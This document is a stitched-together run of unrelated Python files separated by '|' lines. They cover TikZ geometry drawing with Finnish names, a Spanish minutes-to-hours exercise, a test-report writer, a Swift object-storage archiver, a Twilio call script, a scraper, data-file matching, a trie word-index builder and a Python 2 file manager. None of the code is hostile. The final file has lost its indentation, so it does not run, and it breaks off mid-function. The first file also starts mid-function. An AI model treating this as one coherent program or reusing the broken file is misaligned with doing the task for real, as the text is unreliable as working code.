    )
    y = -0.5 * (
        -ax*bx*bx-ax*by*by+ax*cx*cx+ax*cy*cy+ax*ax*bx-ax*ax*cx
        +ay*ay*bx-ay*ay*cx-bx*cx*cx-bx*cy*cy+bx*bx*cx+by*by*cx
    ) / (
        ax*by-ax*cy-ay*bx+ay*cx+bx*cy-by*cx
    )
    keskipiste = (x, y)
    # Radius = distance from the centre to any vertex.
    sade = etaisyys(keskipiste, A)
    return ympyra(keskipiste, sade, nimi, kohta, puoli, piirra)
def ympyranKeskipiste(w, nimi = "", suunta = 0, piirra = True):
    """Like ``piste``, but the point is the centre of circle *w*."""
    cx, cy = w["keskipiste"][0], w["keskipiste"][1]
    return piste(cx, cy, nimi, suunta, piirra)
def ympyranKehapiste(w, kohta, nimi = "", suunta = 0, piirra = True):
    """Draw the point on circle *w*'s circumference at *kohta* degrees."""
    kulma_rad = pi * kohta / 180
    r = w["sade"]
    return piste(w["keskipiste"][0] + r * cos(kulma_rad),
                 w["keskipiste"][1] + r * sin(kulma_rad),
                 nimi, suunta, piirra)
def kulma(A, B, C, nimi = "", monista = 1, kasvata = 0, suunta = None, piirra = True):
    """Draw the angle ABC (vertex at B).

    The arc is drawn *monista* times (double/triple angle marks), its
    radius grown by *kasvata*; *suunta* (degrees) overrides the label
    direction.  Returns an angle object.

    Fix: the returned dict now carries the string "kulma" as its type
    tag -- the original stored the function object itself, unlike every
    other constructor here ("suora", "ympyra").
    """
    alkukulma = atan2(A[1] - B[1], A[0] - B[0])
    loppukulma = atan2(C[1] - B[1], C[0] - B[0])
    if(loppukulma < alkukulma): loppukulma += 2 * pi
    if piirra:
        Ap = muunna(A)
        Bp = muunna(B)
        Cp = muunna(C)
        alkukulmap = atan2(Ap[1] - Bp[1], Ap[0] - Bp[0])
        loppukulmap = atan2(Cp[1] - Bp[1], Cp[0] - Bp[0])
        if(loppukulmap < alkukulmap): loppukulmap += 2 * pi
        valikulmap = 0.5 * (alkukulmap + loppukulmap)
        nimip = valikulmap
        if suunta is not None:
            nimip = pi * suunta / 180
        kulmap = loppukulmap - alkukulmap
        # Narrower angles get a larger arc so the mark stays visible.
        sade = min(max(0.35 / kulmap, 0.5), 3) + kasvata
        with oletusasetukset():
            paksuus(0.45)
            for i in range(monista):
                kuvaaja.piirraParametri(
                    lambda t: Bp[0] + sade * cos(t), lambda t: Bp[1] + sade * sin(t),
                    alkukulmap, loppukulmap, nimi, nimip, 180 * nimip / pi
                )
                nimi = ""       # only the outermost arc gets the label
                sade -= 0.04    # nest repeated arcs slightly inward
    return {"tyyppi": "kulma", "alkukulma": alkukulma, "loppukulma": loppukulma}
def suorakulma(A, B, piirra = True):
    """Draw a right-angle mark at B with one leg pointing towards A.

    Fix: the type tag is now the string "kulma" instead of the ``kulma``
    function object (consistent with the other constructors).
    """
    if piirra:
        Ap = muunna(A)
        Bp = muunna(B)
        d = etaisyys(Ap, Bp)
        # Unit direction from B towards A, scaled to the mark's size.
        u = 0.3 * (Ap[0] - Bp[0]) / d
        v = 0.3 * (Ap[1] - Bp[1]) / d
        paksuus = "{}pt".format(tikzLuku(0.45 * tila.haePaksuus()))
        tila.out.write("\\draw[line width={}] {} -- {} -- {};\n".format(
            paksuus,
            tikzPiste(vekSumma(Bp, (u, v))),
            tikzPiste(vekSumma(Bp, (u - v, u + v))),
            tikzPiste(vekSumma(Bp, (-v, u)))
        ))
    alkukulma = atan2(A[1] - B[1], A[0] - B[0])
    loppukulma = alkukulma + pi / 2
    return {"tyyppi": "kulma", "alkukulma": alkukulma, "loppukulma": loppukulma}
|
#Program: tiempo.py
#Purpose: read a number of minutes and print the equivalent hours/minutes.
#Author: Jose Manuel Serrano Palomo.
#Date: 13/10/2019
#
#Algorithm:
#  READ mins
#  horas   <- whole hours contained in mins
#  minutos <- remaining minutes, rounded to the nearest minute
#  (carry into horas if rounding reaches 60)
#  PRINT horas and minutos
print("Minutos a horas y minutos")
print("-----------------------\n")

import math

#Read the input
mins = float(input("introduce los minutos: "))

#Compute whole hours plus the rounded leftover minutes.
horas = math.floor(mins / 60)
minutos = round(mins - horas * 60)
# Fix: rounding could previously print "X horas y 60 minutos"
# (e.g. 119.7 minutes); carry the overflow into the hours.
if minutos == 60:
    horas += 1
    minutos = 0

#Print the result
print("El resultado es :", horas, " horas y ", minutos, " minutos")
|
#!/usr/bin/env python3
# File Name: Report.py
# Created by: Vadim Lakhterman
# Date: 24.5.20
# Last Update: 25.5.20
import time
import os
import os.path
import Pattern
from Pattern import *
RESULTS_FOLDER = 'Results'
RESULTS_FILENAME = RESULTS_FOLDER + '/' + 'results'
# Timestamp captured once at import so every write in a run hits one file.
TIME = time.strftime("%d%m%y_%H%M%S")
FORMAT = '.json'


class Report:
    """Appends test results to a timestamped JSON-style file under Results/.

    Improvements: the output path is computed once instead of being
    rebuilt in five places, and the odd ``with open(...) as self.file``
    pattern (which left a closed file object on the instance) is replaced
    by a private append helper.

    NOTE(review): the file is assembled from raw fragments, so the result
    is only valid JSON when the open/close calls are balanced by the
    caller -- unchanged from the original design.
    """

    def __init__(self):
        # Single source of truth for the report path.
        self._path = RESULTS_FILENAME + '_' + TIME + FORMAT
        if not os.path.exists(RESULTS_FOLDER):
            os.mkdir(RESULTS_FOLDER)
        with open(self._path, 'w+') as fh:
            fh.write("{\n\"Results\": [\n")

    def _append(self, text):
        """Append *text* verbatim to the report file."""
        with open(self._path, 'a+') as fh:
            fh.write(text)

    def write_new_test_results(self, name):
        """Open a new named result section."""
        self._append("{\n\"" + name + "\": [\n")

    def close_test_results(self):
        """Close the currently open result section."""
        self._append("]\n}\n")

    def write_result(self, data):
        """Serialize one result object (must provide ``toDict``)."""
        results = data.toDict()
        self._append(json.dumps({"found " : results}, indent=4, cls=PatternEncoder))

    def finish(self):
        """Close the top-level Results array."""
        self._append("]\n}\n")
#!/usr/bin/env python3
import os,sys,getopt,tarfile
import getpass
from distutils.spawn import find_executable
import time
import socket
import optparse
import subprocess
import multiprocessing
from swiftclient import Connection
from swiftclient import shell
from swiftclient import RequestException
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import OutputManager
swift_auth=os.environ.get("ST_AUTH")
haz_pigz=False
# Minimal optparse parser so the swiftclient shell functions can run.
def shell_minimal_options():
    """Build the smallest option parser the swiftclient shell accepts.

    Auth/user/key default to the usual ST_* environment variables; the
    long run of --os_* options exists only so the shell can parse them.
    """
    global swift_auth
    parser = optparse.OptionParser()
    parser.add_option('-A', '--auth', dest='auth', default=swift_auth)
    parser.add_option('-V', '--auth-version',
                      default=os.environ.get('ST_AUTH_VERSION',
                                             (os.environ.get('OS_AUTH_VERSION', '1.0'))))
    parser.add_option('-U', '--user', dest='user', default=os.environ.get('ST_USER'))
    parser.add_option('-K', '--key', dest='key', default=os.environ.get('ST_KEY'))
    for keystone_opt in ('--os_user_id', '--os_user_domain_id',
                         '--os_user_domain_name', '--os_tenant_id',
                         '--os_tenant_name', '--os_project_id',
                         '--os_project_domain_id', '--os_project_name',
                         '--os_project_domain_name', '--os_service_type',
                         '--os_endpoint_type', '--os_auth_token',
                         '--os_storage_url', '--os_region_name'):
        parser.add_option(keystone_opt)
    parser.add_option('-v', '--verbose', action='count', dest='verbose',
                      default=1, help='Print more info.')
    return parser
# Wrapper around the swiftclient shell entry points.
def sw_shell(sw_fun, *args):
    """Invoke a swiftclient shell command with our minimal parser.

    A dummy argv[0] is prepended because the shell functions expect the
    program name at the front of the argument list; client/network errors
    are reported through the OutputManager instead of propagating.
    """
    argv = ['', *args]
    with OutputManager() as output:
        parser = shell_minimal_options()
        try:
            sw_fun(parser, argv, output)
        except (ClientException, RequestException, socket.error) as err:
            output.error(str(err))
def sw_stat(*args):
    """Run `swift stat` with the given arguments."""
    sw_shell(shell.st_stat, *args)

def sw_ls(*args):
    """Run `swift list` with the given arguments."""
    sw_shell(shell.st_list, *args)

def sw_download(*args):
    """Run `swift download` with the given arguments."""
    sw_shell(shell.st_download, *args)

def sw_upload(*args):
    """Run `swift upload` with the given arguments."""
    sw_shell(shell.st_upload, *args)

def sw_post(*args):
    """Run `swift post` with the given arguments."""
    sw_shell(shell.st_post, *args)
# suffix of archive files
tar_suffix=".tar.gz"
# marks tars that bundle several small sibling directories
bundle_id=".bundle"
# marks the tar holding files found at the archive root
root_id=".root"
# True if any component of the path is hidden (starts with '.'), else False
def is_hidden_dir(dir_name):
    """Return True when any '/'-separated component of *dir_name* starts
    with a dot.

    Fix: uses startswith instead of item[0], so an empty component
    (produced by a doubled or trailing '/') no longer raises IndexError.
    """
    return any(part.startswith('.') for part in dir_name.split('/'))
def print_flush(message):
    """Write *message* plus a newline to stdout and flush immediately.

    Fix: the parameter was renamed from ``str``, which shadowed the
    builtin (callers pass it positionally).
    """
    sys.stdout.write(message + '\n')
    sys.stdout.flush()
# getpid is sufficient because it differs between multiprocessing tasks
def unique_id():
    """Return this process's pid as a string (used to name temp files)."""
    return "%d" % os.getpid()
def create_tar_file(filename, src_path, file_list):
    """Create *filename* by tarring *file_list* relative to *src_path*.

    Uses pigz for compression when available.  Lists longer than 16
    entries go through a temporary "-T" list file so argv stays short.
    """
    global haz_pigz
    cmd = ["tar", "cvf", filename, "--directory=" + src_path]
    if haz_pigz:
        cmd = cmd + ["--use-compress-program=pigz"]
    if len(file_list) > 16:
        list_file = ".tar." + unique_id()
        with open(list_file, "w") as fh:
            for entry in file_list:
                fh.write(entry + '\n')
        subprocess.call(cmd + ["-T", list_file])
        os.unlink(list_file)
    else:
        subprocess.call(cmd + file_list)
def upload_file_to_swift(filename, swiftname, container):
    """Upload *filename* to *container* as object *swiftname*, using SLO
    segments so objects larger than a single-object limit are accepted."""
    segment_container = ".segments_" + container
    uploader_header = "X-Object-Meta-Uploaded-by:" + getpass.getuser()
    sw_upload("--object-name=" + swiftname,
              "--segment-size=2147483648",
              "--use-slo",
              "--segment-container=" + segment_container,
              "--header=" + uploader_header,
              container, filename)
def append_bundle(tar, src_path, file_list, rel_path):
    """Add each file of *file_list* to the open *tar*, stored under
    *rel_path*, echoing every source path as it is added."""
    for name in file_list:
        full_path = os.path.join(src_path, name)
        tar.add(full_path, os.path.join(rel_path, name))
        print_flush(full_path)
def start_bundle(src_path, file_list, tmp_dir, rel_path, prefix):
    """Open a new bundle tar seeded with *file_list* from *src_path*.

    Returns (local tar filename, swift object name, open tarfile handle).
    """
    global tar_suffix
    global bundle_id
    # Name of the object as it will appear in swift.
    archive_name = os.path.join(
        prefix, os.path.basename(src_path) + bundle_id + tar_suffix)
    # Local scratch tar, pid-prefixed so parallel workers never collide.
    temp_archive_name = unique_id() + os.path.basename(archive_name)
    if tmp_dir:
        temp_archive_name = os.path.join(tmp_dir, temp_archive_name)
    tar = tarfile.open(temp_archive_name, "w:gz")
    append_bundle(tar, src_path, file_list, rel_path)
    return temp_archive_name, archive_name, tar
def end_bundle(tar, bundle_name, archive_name, container):
    """Close the bundle tar, upload it as *archive_name*, then delete the
    local copy."""
    tar.close()
    upload_file_to_swift(bundle_name, archive_name, container)
    os.unlink(bundle_name)
def archive_tar_file(src_path, file_list, container, tmp_dir, pre_path):
    """Tar *file_list* from *src_path*, upload it to swift as
    *pre_path* + suffix, then remove the local tar."""
    global tar_suffix
    archive_name = pre_path + tar_suffix
    # pid-prefixed local name so parallel workers never collide
    local_name = unique_id() + os.path.basename(archive_name)
    if tmp_dir:
        local_name = os.path.join(tmp_dir, local_name)
    create_tar_file(local_name, src_path, file_list)
    upload_file_to_swift(local_name, archive_name, container)
    os.unlink(local_name)
# total size of a directory's own files, excluding subdirectories
def flat_dir_size(d, file_list):
    """Sum the sizes of the regular files from *file_list* inside
    directory *d*; non-files (subdirs, missing names) are skipped."""
    total = 0
    for name in file_list:
        full = os.path.join(d, name)
        if os.path.isfile(full):
            total += os.path.getsize(full)
    return total
def is_child_or_sib(dir_name, last_dir):
    """True when *dir_name* is a direct child or a sibling of *last_dir*."""
    parent = os.path.dirname(dir_name)
    return parent == last_dir or parent == os.path.dirname(last_dir)
# job layout: [src_path, file_list, container, tmp_dir, pre_path]
def archive_worker(queue):
    """Worker loop: pull archive jobs off *queue* until a None sentinel."""
    while True:
        job = queue.get(True)
        if job is None:
            break  # sentinel: no more work
        archive_tar_file(job[0], job[1], job[2], job[3], job[4])
        queue.task_done()
    queue.task_done()  # account for the sentinel itself
def generic_q_close(q, par):
    """Send one None sentinel per worker, wait for the queue to drain,
    then close it."""
    for _ in range(par):
        q.put(None)  # termination sentinel, one per worker
    # Poll until empty rather than join(): the workers also task_done()
    # the sentinels themselves.
    while not q.empty():
        time.sleep(1)
    q.close()
#print("DEBUG: all workers rejoined",os.getpid())
def archive_to_swift(local_dir,container,no_hidden,tmp_dir,bundle,prefix,par):
    """Walk *local_dir* and upload every directory's files to *container*.

    Small adjacent directories (child or sibling of the previous one) are
    accumulated into a shared "bundle" tar until it reaches *bundle*
    bytes; larger directories are tarred individually by *par* parallel
    worker processes.  ``bundle_state`` holds the byte count of the
    currently open bundle (0 = no bundle open).
    """
    bundle_state=0
    last_dir=""
    archive_q=multiprocessing.JoinableQueue()
    archive_pool=multiprocessing.Pool(par,archive_worker,(archive_q,))
    for dir_name, subdir_list, file_list in os.walk(local_dir):
        rel_path=os.path.relpath(dir_name,local_dir)
        if (not (no_hidden and is_hidden_dir(rel_path)) and file_list):
            dir_size=flat_dir_size(dir_name,file_list)
            if bundle_state and is_child_or_sib(dir_name,last_dir):
                # A bundle is open and this directory is adjacent: append.
                bundle_state=bundle_state+dir_size
                append_bundle(tar,dir_name,file_list,rel_path)
                if bundle_state>=bundle:
                    # Bundle reached its size target -> upload and reset.
                    end_bundle(tar,current_bundle,a_name,container)
                    bundle_state=0
            else:
                if bundle_state:
                    # Unrelated directory: flush the open bundle first.
                    end_bundle(tar,current_bundle,a_name,container)
                if dir_size<bundle:
                    # Small directory: open a fresh bundle seeded with it.
                    current_bundle,a_name,tar=start_bundle(dir_name,file_list,
                        tmp_dir,rel_path,prefix)
                    bundle_state=dir_size
                else:
                    # if files in root directory use basename of root
                    if rel_path==".":
                        rel_path=os.path.basename(dir_name)+root_id
                    # Large directory: hand it to a parallel worker.
                    archive_q.put([dir_name,file_list,container,tmp_dir,
                        os.path.join(prefix,rel_path)])
                    bundle_state=0
        last_dir=dir_name
    if bundle_state>0:
        # Flush the bundle still open when the walk ends.
        end_bundle(tar,current_bundle,a_name,container)
    generic_q_close(archive_q,par)
# map an archive object name onto a local directory tree
def create_local_path(local_dir, archive_name):
    """Return the local extraction directory for *archive_name* (the
    archive suffix stripped), creating it if necessary."""
    global tar_suffix
    target = os.path.join(local_dir, archive_name)
    if target.endswith(tar_suffix):
        target = target[:-len(tar_suffix)]
    if not os.path.exists(target):
        os.makedirs(target)
    return target
def create_sw_conn():
    """Build a swiftclient Connection from the ST_* environment variables;
    print an error and return None when they are not all set."""
    global swift_auth
    user = os.environ.get("ST_USER")
    key = os.environ.get("ST_KEY")
    if swift_auth and user and key:
        return Connection(authurl=swift_auth, user=user, key=key)
    print("Error: Swift environment not configured!")
def extract_tar_file(tar_path, termpath):
    """Extract *tar_path* into directory *termpath* via the tar command,
    using pigz for decompression when available.

    Fix: the first parameter was renamed from ``tarfile``, which shadowed
    the imported ``tarfile`` module (callers pass it positionally).
    """
    global haz_pigz
    tar_params = ["tar", "xvf", tar_path, "--directory=" + termpath]
    if haz_pigz:
        tar_params = tar_params + ["--use-compress-program=pigz"]
    subprocess.call(tar_params)
# job layout: [tmp_dir, container, obj_name, local_dir]
def extract_worker(queue):
    """Worker loop: download and unpack objects until a None sentinel.

    Fix: the loop now recognises the None sentinels that
    generic_q_close() sends (exactly as archive_worker already did);
    previously ``item[0]`` on the sentinel raised TypeError when
    shutdown began.
    """
    global tar_suffix
    global bundle_id
    global root_id
    while True:
        item = queue.get(True)
        if item is None:
            break  # sentinel from generic_q_close()
        tmp_dir = item[0]
        container = item[1]
        obj_name = item[2]
        local_dir = item[3]
        # download the tar into a pid-unique temp file
        temp_file = unique_id() + tar_suffix
        if tmp_dir:
            temp_file = os.path.join(tmp_dir, temp_file)
        sw_download("--output=" + temp_file, container, obj_name)
        # bundle/root tars already carry their directory paths internally,
        # so they extract straight into local_dir
        if obj_name.endswith(bundle_id + tar_suffix) or \
           obj_name.endswith(root_id + tar_suffix):
            term_path = local_dir
        else:
            term_path = create_local_path(local_dir, obj_name)
        extract_tar_file(temp_file, term_path)
        os.unlink(temp_file)
        queue.task_done()
    queue.task_done()  # account for the sentinel
def extract_to_local(local_dir,container,no_hidden,tmp_dir,prefix,par):
    """Download every archive object of *container* and unpack it under
    *local_dir* with *par* parallel worker processes.

    Objects are filtered to those ending with the archive suffix, and
    optionally by *prefix* and by hidden-directory names.
    """
    global tar_suffix
    global bundle_id
    global root_id
    swift_conn=create_sw_conn()
    if swift_conn:
        extract_q=multiprocessing.JoinableQueue()
        extract_pool=multiprocessing.Pool(par,extract_worker,(extract_q,))
        try:
            headers,objs=swift_conn.get_container(container)
            for obj in objs:
                if obj['name'].endswith(tar_suffix):
                    if prefix and not obj['name'].startswith(prefix):
                        continue
                    if no_hidden and is_hidden_dir(obj['name']):
                        continue
                    # param order: [tmp_dir,container,obj_name,local_dir]
                    extract_q.put([tmp_dir,container,obj['name'],local_dir])
        except ClientException:
            print("Error: cannot access Swift container '%s'!" % container)
        generic_q_close(extract_q,par)
        swift_conn.close()
def usage():
    """Print the command-line help text."""
    print("archive [parameters]")
    print("Parameters:")
    for line in ("\t-l local_directory (default .)",
                 "\t-c container (required)",
                 "\t-x (extract from container to local directory)",
                 "\t-n (no hidden directories)",
                 "\t-t temp_dir (directory for temp files)",
                 "\t-b bundle_size (in M or G)",
                 "\t-a auth_token (default ST_AUTH)",
                 "\t-p prefix",
                 "\t-P parallel_instances (default 3)"):
        print(line)
def validate_dir(path, param):
    """Exit with an error unless *path* is a directory; return it with a
    single trailing '/' removed (if present)."""
    if not os.path.isdir(path):
        print("Error: %s '%s' is not accessible!" % (param, path))
        sys.exit()
    if path.endswith('/'):
        path = path[:-1]
    return(path)
def validate_bundle(arg):
    """Parse a bundle size such as '5M', '2G' or a plain byte count;
    exit with an error on any other suffix."""
    suffix = arg[-1].upper()
    if suffix == 'M':
        return int(arg[:-1]) * 1000000
    if suffix == 'G':
        return int(arg[:-1]) * 1000000000
    if suffix.isdigit():
        return int(arg)
    print("Error: illegal bundle suffix '%c'" % suffix)
    sys.exit()
def main(argv):
    """Command-line entry point: parse the flags, then archive to or
    extract from the given swift container (see usage() for the flags).
    """
    global swift_auth
    global haz_pigz
    local_dir="."
    container=""
    tmp_dir=""
    extract=False
    no_hidden=False
    bundle=0
    prefix=""
    par=3
    try:
        opts,args=getopt.getopt(argv,"l:c:t:b:a:p:P:xnh")
    except getopt.GetoptError:
        usage()
        sys.exit()
    for opt,arg in opts:
        if opt in ("-h"):
            usage()
            sys.exit()
        elif opt in ("-l"): # override default local directory
            local_dir=validate_dir(arg,"local")
        elif opt in ("-c"): # set container
            container=arg
        elif opt in ("-t"): # temp file directory
            tmp_dir=validate_dir(arg,"tmp_dir")
        elif opt in ("-b"): # bundle size
            bundle=validate_bundle(arg)
        elif opt in ("-a"): # override auth_token
            swift_auth=arg
        elif opt in ("-p"): # set prefix
            prefix=arg
        elif opt in ("-P"): # set parallel threads
            par=int(arg)
        elif opt in ("-x"): # extract mode
            extract=True
        elif opt in ("-n"): # set no-hidden flag to skip .*
            no_hidden=True
    if not container:
        usage()
    else:
        # use pigz for parallel (de)compression when it is on PATH
        if find_executable("pigz"):
            haz_pigz=True
        if extract:
            extract_to_local(local_dir,container,no_hidden,tmp_dir,prefix,par)
        else:
            # make sure the container exists before uploading into it
            sw_post(container)
            archive_to_swift(local_dir,container,no_hidden,tmp_dir,bundle,prefix,
                par)

if __name__=="__main__":
    main(sys.argv[1:])
|
import os
from twilio.rest import Client
# Credentials come from the environment so they never live in source.
account_sid = os.environ["TWILIO_ACCOUNT_SID"]
auth_token = os.environ["TWILIO_AUTH_TOKEN"]
client = Client(account_sid, auth_token)

# Place an outbound call that speaks a short greeting.
# Fixes: removed the stray '"' inside the spoken text, and dropped the
# `url` argument -- the Calls API accepts only one instruction source
# (twiml OR url), not both.
call = client.calls.create(
    to="+19254781531",
    from_=os.environ["TWILIO_SMS_FROM"],
    twiml='<Response><Say>Howdy, Anne!</Say></Response>',
)
print(call.sid)
|
import urllib.request
class Scraper(object):
    """Fetch a URL's body and keep it as decoded text."""

    def __init__(self, url):
        self.url = url

    def grab_contents(self):
        """Download the page, store the decoded text on ``self.data`` and
        return it.

        Fixes: the original ended with a dangling ``self.`` (a syntax
        error) and never closed the connection; the response is now used
        as a context manager.
        """
        with urllib.request.urlopen(self.url) as response:
            self.data = response.read().decode('UTF-8')
        return self.data
|
def cmpare(num2, prev):
    """Return True when the two sequences are element-wise identical.

    Fix: the original indexed num2 over range(len(prev)) and raised
    IndexError whenever prev was longer than num2; a length check plus
    pairwise comparison handles every case.
    """
    return len(num2) == len(prev) and all(a == b for a, b in zip(num2, prev))
#Fe: keep only the lines with exactly 4 columns
with open("spindownFe.txt","r") as f1, open("spinupdown_parsed.txt","w") as f2:
    for line in f1:
        if len(line.split()) == 4:
            f2.write(line)

#Nb: the same filtering for the second data set
with open("datasample2.txt","r") as f1, open("datasample2_parsed.txt","w") as f2:
    for line in f1:
        if len(line.split()) == 4:
            f2.write(line)

# Fix: the original appended `map(float, ...)` iterator objects.  In
# Python 3 those cannot be compared or indexed, so the `not in`
# deduplication silently failed and `i[0]` below raised TypeError.
# Materialize each row as a list of floats instead.
num1_set = []
with open("spinupdown_parsed.txt","r") as f1:
    for line1 in f1:
        num1_set.append([float(v) for v in line1.split()])
num1_no_repeats = [ele for ind, ele in enumerate(num1_set) if ele not in num1_set[:ind]]

num2_set = []
with open("datasample2_parsed.txt","r") as f2:
    for line2 in f2:
        num2_set.append([float(v) for v in line2.split()])
num2_no_repeats = [ele for ind, ele in enumerate(num2_set) if ele not in num2_set[:ind]]

# Write the pairs whose first two coordinates match exactly
# (the <= 0.0 tolerance means strict equality).
with open("spindown_result.txt","w") as f3:
    for i in num1_no_repeats:
        for j in num2_no_repeats:
            if (abs(i[0]-j[0]) <= 0.0) and (abs(i[1]-j[1]) <= 0.0):
                f3.write("("+str(i[0])+", "+str(i[1])+", "+str(i[2])+")\t("+str(j[0])+", "+str(j[1])+", "+str(j[2])+")\n")
|
import os
from trie import Trie, _iter_nonempty
from string import Template, ascii_lowercase
from itertools import zip_longest
def escape(word):
    """Encode *word* (lowercased) so it is safe to use as a file name.

    Alphanumeric characters pass through untouched; anything else becomes
    ``-<ordinal>-`` so that :func:`unescape` can losslessly reverse it.
    """
    word = word.lower()
    # str.join over a generator avoids the original quadratic += building.
    return ''.join(
        char if char.isalnum() else '-%d-' % ord(char)
        for char in word
    )
def unescape(word):
    """Reverse :func:`escape`: restore ``-<ordinal>-`` runs to characters."""
    pieces = word.split('-')
    # Even-indexed pieces are literal text; odd-indexed pieces are the
    # decimal ordinals that escape() produced.
    return ''.join(
        piece if idx % 2 == 0 else chr(int(piece))
        for idx, piece in enumerate(pieces)
    )
### READ ALL CHAPTERS ###
# Walk ch<N>/p<M>.txt files until a chapter with no first page is found.
# `index` maps each word to a list of (chapter, page, word-position)
# occurrences; Trie is a project type with a dict-like setdefault API.
chap_i, page_i = 1, 1
filetemp = Template('ch$c/p$p.txt')
index = Trie()
while True:
    # Consume every consecutive page of the current chapter.
    while os.path.isfile(filetemp.substitute(c=chap_i, p=page_i)):
        with open(filetemp.substitute(c=chap_i, p=page_i),encoding='utf-8') as file:
            word_i = 1  # 1-based word position within the page
            for line in file:
                for word in line.split():
                    index.setdefault(word, []).append((chap_i, page_i, word_i))
                    word_i += 1
        page_i += 1
    if page_i == 1:
        # The chapter has no page 1 at all: we've run out of chapters.
        break
    print('Found chapter', chap_i, 'containing', page_i-1, 'pages', flush=True)
    chap_i += 1
    page_i = 1
print('Total words found:', len(index), flush=True)
### SCAN EXISTING INDEX, DELETE AS APPROPRIATE ###
# Remove on-disk index files for words that no longer occur, and remember
# what remains in `ex_files` so the update pass below can skip unchanged
# files.  NOTE: we chdir into index/ and stay there for the next section.
os.makedirs('index', exist_ok=True)
os.chdir('index')
ex_files = {}
removed = 0
for ex_folder in os.listdir():
    if not os.path.isdir(ex_folder):
        print('Odd file found in index:', ex_folder, flush=True)
    else:
        ex_files[ex_folder] = os.listdir(ex_folder)
        files_left = False
        for ex_file in ex_files[ex_folder]:
            # File names are escape(word) + '.txt'; strip the extension and
            # unescape to recover the original word.
            if unescape(ex_file[:-4]) not in index:
                os.remove(ex_folder + '/' + ex_file)
                removed += 1
            else:
                files_left = True
        if not files_left:
            os.rmdir(ex_folder)
print(removed, 'file(s) culled', flush=True)
### UPDATE/CREATE INDEX FILES ###
# For every indexed word, (re)write index/<letter>/<escaped word>.txt with
# one "chapter,page,word" line per occurrence -- but only when the existing
# file's contents actually differ.
updated, created = 0, 0
for letter, basenode in index._root.next.items():
    # Words whose first character is not a lowercase letter share folder '0'.
    if letter in ascii_lowercase:
        folder = letter
    else:
        folder = '0'
    for node in _iter_nonempty(basenode):
        word, positions = node.key, node.value
        filecontent = [','.join(str(x) for x in pos) for pos in positions]
        filename = escape(word) + '.txt'
        if folder in ex_files and filename in ex_files[folder]:
            # Compare the existing file line-by-line with the new content.
            ex_file = open(folder + '/' + filename,encoding='utf-8')
            i = 0
            for line in ex_file:
                if i >= len(filecontent) or line.strip() != filecontent[i]:
                    ex_file.close()
                    break
                i += 1
            else:
                # for/else: the loop ran to completion, every line matched.
                ex_file.close()
                if i == len(filecontent):
                    continue  # file already up to date -- skip the rewrite
            updated += 1
        else:
            created += 1
            os.makedirs(folder, exist_ok=True)
        with open(folder + '/' + filename,mode='w',encoding='utf-8') as indexFile:
            for line in filecontent:
                print(line, file=indexFile)
os.chdir(os.pardir)
print(created, 'file(s) created', flush=True)
print(updated, 'file(s) updated', flush=True)
### UPDATE/CREATE SUGGESTION FILES ###
os.makedirs('suggest', exist_ok=True)
os.chdir('suggest')
def build_suggest(node):
    """Mirror the suggestion trie onto disk, one folder per trie edge.

    Each node's ranked suggestions go into an ``s.txt`` in the node's
    folder; files/folders for edges that no longer exist are culled, and
    ``s.txt`` is only rewritten when its contents actually changed.
    Recurses with os.chdir, so the cwd must be the node's own folder.
    """
    global removed, updated, created
    # Print progress
    build_suggest.progress += 1
    percent = (100 * build_suggest.progress) // index.num_nodes()
    if percent >= build_suggest.next_milestone:
        print(percent, '%', sep='', flush=True)
        build_suggest.next_milestone += 10
    # Output file for this node
    needwrite = False
    if os.path.isfile('s.txt'):
        with open('s.txt', encoding='utf-8') as file:
            for ex_word, new_word in zip_longest(file, node.suggest):
                if not ex_word or new_word is None:
                    # One side ran out of entries.  The `new_word is None`
                    # guard fixes a crash in the original, which fell
                    # through to `new_word[0]` (TypeError) whenever the
                    # existing file had MORE lines than node.suggest.
                    needwrite = True
                    updated += 1
                    break
                ex_word = ex_word.strip()
                if len(ex_word) != 0 and ex_word != new_word[0]:
                    needwrite = True
                    updated += 1
                    break
    else:
        needwrite = True
        created += 1
    if needwrite:
        with open('s.txt', mode='w', encoding='utf-8') as file:
            for word in node.suggest:
                print(''.join(word[0]), file=file)
    # Check subfolders: delete anything that no longer matches a trie edge.
    for entry in os.scandir():
        if entry.is_dir() and unescape(entry.name) not in node.next:
            # Bottom-up walk so directories are empty before rmdir.
            for root, dirs, files in os.walk(entry.name, topdown=False):
                for name in files:
                    os.remove(os.path.join(root, name))
                    removed += 1
                for name in dirs:
                    os.rmdir(os.path.join(root, name))
        elif entry.is_file() and entry.name != 's.txt':
            os.remove(entry.name)
            removed += 1
    # Recurse into each child edge's folder.
    for letter, n in node.next.items():
        folder = escape(letter)
        os.makedirs(folder, exist_ok=True)
        os.chdir(folder)
        build_suggest(n)
        os.chdir(os.pardir)
# Precompute up to 10 ranked suggestions per trie node, then sync the
# on-disk suggestion tree with them.  The counters and progress state are
# module-level/function attributes read by build_suggest above.
index.gensuggestions(10)
print('Building suggestions: 0%', flush=True)
removed, updated, created = 0, 0, 0
build_suggest.progress, build_suggest.next_milestone = 0, 10
build_suggest(index._root)
print(removed, 'file(s) culled', flush=True)
print(created, 'file(s) created', flush=True)
print(updated, 'file(s) updated', flush=True)
print('Finished building index')
|
import os
import shutil
def create():
path = raw_input("enter the path where u want to create a file: ") # location of file
try:
os.chdir(path) # changing directory
except OSError: ## error handling in case of that directory does nit exist
print "No such directory"
else:
name = raw_input("give a name to a file:") # to give a name to a file
if name not in os.listdir(path): # to check if the name is unique
open(name, "w") # creating file by opening it in write mode
print "DONE SUCCESFULLY!!!"
else:
print "there is a file in this directory with the same name"
##############################################################################
def delete():
path = raw_input("enter the location:") # location of file
try:
os.chdir(path) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter filename u want to delete:") # entering the name of file
if filename in os.listdir(path):
os.remove(filename) # removing file
print "DONE SUCCESFULLY!!!"
else: # error handling if the file does not exist
print "No such file"
############################################################################
def rename():
path = raw_input("enter the location:") # location of file
try:
os.chdir(path) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter filename u want to change:") # current filename
if filename in os.listdir(path):
new = raw_input("enter new filename:") # new filename
if new not in os.listdir(path):
os.rename(filename, new) # renaming the file
print "DONE SUCCESFULLY!!!"
else:
print "there is a file in this directory with the same name"
else: # error handling if the file does not exist
print "No such file"
############################################################################
def copy():
source = raw_input("enter the location of file u want to copy:") # location of file
try:
os.chdir(source) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter the name of file u want to copy:") # entering filename
